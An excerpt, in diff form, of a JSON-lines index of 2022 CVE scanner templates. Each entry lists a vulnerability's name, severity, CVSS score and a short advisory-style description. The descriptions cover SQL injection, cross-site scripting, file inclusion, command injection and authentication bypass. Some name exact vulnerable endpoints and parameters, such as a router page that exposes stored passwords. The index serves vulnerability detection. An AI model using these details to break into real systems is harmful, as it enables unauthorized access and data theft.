{"ID":"CVE-2022-32094","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"critical","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32094.yaml"}
{"ID":"CVE-2022-32195","Info":{"Name":"Open edX \u003c2022-06-06 - Cross-Site Scripting","Severity":"medium","Description":"Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32195.yaml"}
{"ID":"CVE-2022-32409","Info":{"Name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","Severity":"critical","Description":"Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32409.yaml"}
{"ID":"CVE-2022-3242","Info":{"Name":"Microweber \u003c1.3.2 - Cross-Site Scripting","Severity":"medium","Description":"Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-3242.yaml"}
{"ID":"CVE-2022-32429","Info":{"Name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","Severity":"critical","Description":"MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-32429.yaml"}
{"ID":"CVE-2022-32444","Info":{"Name":"u5cms v8.3.5 - Open Redirect","Severity":"medium","Description":"u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32444.yaml"}
{"ID":"CVE-2022-32770","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-32770.yaml"}
@ -1723,6 +1800,8 @@
{"ID":"CVE-2022-34047","Info":{"Name":"WAVLINK WN530HG4 - Improper Access Control","Severity":"high","Description":"WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34047.yaml"}
{"ID":"CVE-2022-34048","Info":{"Name":"Wavlink WN-533A8 - Cross-Site Scripting","Severity":"medium","Description":"Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34048.yaml"}
{"ID":"CVE-2022-34049","Info":{"Name":"WAVLINK WN530HG4 - Improper Access Control","Severity":"medium","Description":"Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-34049.yaml"}
{"ID":"CVE-2022-34093","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34093.yaml"}
{"ID":"CVE-2022-34094","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34094.yaml"}
{"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34121.yaml"}
{"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34328.yaml"}
{"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Improper Access Control","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34576.yaml"}
@ -1735,10 +1814,12 @@
{"ID":"CVE-2022-35413","Info":{"Name":"WAPPLES Web Application Firewall \u003c=6.0 - Hardcoded Credentials","Severity":"critical","Description":"WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-35413.yaml"}
{"ID":"CVE-2022-35416","Info":{"Name":"H3C SSL VPN \u003c=2022-07-10 - Cross-Site Scripting","Severity":"medium","Description":"H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-35416.yaml"}
{"ID":"CVE-2022-35493","Info":{"Name":"eShop 3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-35493.yaml"}
{"ID":"CVE-2022-35653","Info":{"Name":"Moodle LTI module Reflected - Cross-Site Scripting","Severity":"medium","Description":"A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-35653.yaml"}
{"ID":"CVE-2022-3578","Info":{"Name":"WordPress ProfileGrid \u003c5.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-3578.yaml"}
{"ID":"CVE-2022-35914","Info":{"Name":"GLPI \u003c=10.0.2 - Remote Command Execution","Severity":"critical","Description":"GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-35914.yaml"}
{"ID":"CVE-2022-36446","Info":{"Name":"Webmin \u003c1.997 - Authenticated Remote Code Execution","Severity":"critical","Description":"Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-36446.yaml"}
{"ID":"CVE-2022-36537","Info":{"Name":"ZK Framework - Information Disclosure","Severity":"high","Description":"ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-36537.yaml"}
{"ID":"CVE-2022-36553","Info":{"Name":"Hytec Inter HWL-2511-SS - Remote Command Execution","Severity":"critical","Description":"Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-36553.yaml"}
{"ID":"CVE-2022-36642","Info":{"Name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","Severity":"critical","Description":"Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-36642.yaml"}
{"ID":"CVE-2022-36804","Info":{"Name":"Atlassian Bitbucket - Remote Command Injection","Severity":"high","Description":"Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-36804.yaml"}
{"ID":"CVE-2022-36883","Info":{"Name":"Jenkins Git \u003c=4.11.3 - Missing Authorization","Severity":"high","Description":"Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-36883.yaml"}
@ -1758,6 +1839,7 @@
{"ID":"CVE-2022-38794","Info":{"Name":"Zaver - Local File Inclusion","Severity":"high","Description":"Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-38794.yaml"}
{"ID":"CVE-2022-38817","Info":{"Name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","Severity":"high","Description":"Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-38817.yaml"}
{"ID":"CVE-2022-38870","Info":{"Name":"Free5gc 3.2.1 - Information Disclosure","Severity":"high","Description":"Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-38870.yaml"}
{"ID":"CVE-2022-39048","Info":{"Name":"ServiceNow - Cross-site Scripting","Severity":"medium","Description":"A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-39048.yaml"}
{"ID":"CVE-2022-3908","Info":{"Name":"WordPress Helloprint \u003c1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-3908.yaml"}
{"ID":"CVE-2022-39195","Info":{"Name":"LISTSERV 17 - Cross-Site Scripting","Severity":"medium","Description":"LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the \"c\" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-39195.yaml"}
{"ID":"CVE-2022-3933","Info":{"Name":"WordPress Essential Real Estate \u003c3.9.6 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-3933.yaml"}
@ -1768,11 +1850,15 @@
{"ID":"CVE-2022-39960","Info":{"Name":"Jira Netic Group Export \u003c1.0.3 - Missing Authorization","Severity":"medium","Description":"Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-39960.yaml"}
{"ID":"CVE-2022-39986","Info":{"Name":"RaspAP 2.8.7 - Unauthenticated Command Injection","Severity":"critical","Description":"A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-39986.yaml"}
{"ID":"CVE-2022-40022","Info":{"Name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","Severity":"critical","Description":"Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40022.yaml"}
{"ID":"CVE-2022-40032","Info":{"Name":"Simple Task Managing System v1.0 - SQL Injection","Severity":"critical","Description":"SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40032.yaml"}
{"ID":"CVE-2022-40047","Info":{"Name":"Flatpress \u003c v1.2.1 - Cross Site Scripting","Severity":"medium","Description":"Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-40047.yaml"}
{"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2022/CVE-2022-40083.yaml"}
{"ID":"CVE-2022-40127","Info":{"Name":"AirFlow \u003c 2.4.0 - Remote Code Execution","Severity":"high","Description":"A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-40127.yaml"}
{"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-40359.yaml"}
{"ID":"CVE-2022-4049","Info":{"Name":"WP User \u003c= 7.0 - Unauthenticated SQLi","Severity":"critical","Description":"The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4049.yaml"}
{"ID":"CVE-2022-4050","Info":{"Name":"WordPress JoomSport \u003c5.2.8 - SQL Injection","Severity":"critical","Description":"WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4050.yaml"}
{"ID":"CVE-2022-4057","Info":{"Name":"Autoptimize \u003c 3.1.0 - Information Disclosure","Severity":"medium","Description":"The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-4057.yaml"}
{"ID":"CVE-2022-4059","Info":{"Name":"Cryptocurrency Widgets Pack \u003c 2.0 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4059.yaml"}
{"ID":"CVE-2022-4060","Info":{"Name":"WordPress User Post Gallery \u003c=2.19 - Remote Code Execution","Severity":"critical","Description":"WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4060.yaml"}
{"ID":"CVE-2022-4063","Info":{"Name":"WordPress InPost Gallery \u003c2.1.4.1 - Local File Inclusion","Severity":"critical","Description":"WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4063.yaml"}
{"ID":"CVE-2022-40684","Info":{"Name":"Fortinet - Authentication Bypass","Severity":"critical","Description":"Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40684.yaml"}
@ -1801,6 +1887,7 @@
{"ID":"CVE-2022-43016","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43016.yaml"}
{"ID":"CVE-2022-43017","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43017.yaml"}
{"ID":"CVE-2022-43018","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43018.yaml"}
{"ID":"CVE-2022-4305","Info":{"Name":"Login as User or Customer \u003c 3.3 - Privilege Escalation","Severity":"critical","Description":"The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4305.yaml"}
{"ID":"CVE-2022-4306","Info":{"Name":"WordPress Panda Pods Repeater Field \u003c1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-4306.yaml"}
{"ID":"CVE-2022-43140","Info":{"Name":"kkFileView 4.1.0 - Server-Side Request Forgery","Severity":"high","Description":"kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-43140.yaml"}
{"ID":"CVE-2022-43164","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43164.yaml"}
@ -1815,6 +1902,8 @@
{"ID":"CVE-2022-4325","Info":{"Name":"WordPress Post Status Notifier Lite \u003c1.10.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4325.yaml"}
{"ID":"CVE-2022-4328","Info":{"Name":"WooCommerce Checkout Field Manager \u003c 18.0 - Arbitrary File Upload","Severity":"critical","Description":"The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4328.yaml"}
{"ID":"CVE-2022-43769","Info":{"Name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","Severity":"high","Description":"Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-43769.yaml"}
{"ID":"CVE-2022-44290","Info":{"Name":"WebTareas 2.4p5 - SQL Injection","Severity":"critical","Description":"webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-44290.yaml"}
{"ID":"CVE-2022-44291","Info":{"Name":"WebTareas 2.4p5 - SQL Injection","Severity":"critical","Description":"webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-44291.yaml"}
{"ID":"CVE-2022-4447","Info":{"Name":"WordPress Fontsy \u003c=1.8.6 - SQL Injection","Severity":"critical","Description":"WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4447.yaml"}
{"ID":"CVE-2022-44877","Info":{"Name":"CentOS Web Panel 7 \u003c0.9.8.1147 - Remote Code Execution","Severity":"critical","Description":"CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-44877.yaml"}
{"ID":"CVE-2022-44944","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44944.yaml"}
@ -1825,12 +1914,14 @@
{"ID":"CVE-2022-44950","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44950.yaml"}
{"ID":"CVE-2022-44951","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44951.yaml"}
{"ID":"CVE-2022-44952","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44952.yaml"}
{"ID":"CVE-2022-44957","Info":{"Name":"WebTareas 2.4p5 - Cross-Site Scripting","Severity":"medium","Description":"webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44957.yaml"}
{"ID":"CVE-2022-45037","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45037.yaml"}
{"ID":"CVE-2022-45038","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45038.yaml"}
